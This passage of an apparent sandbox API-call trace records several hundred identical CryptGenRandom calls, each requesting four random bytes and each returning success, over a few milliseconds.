1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 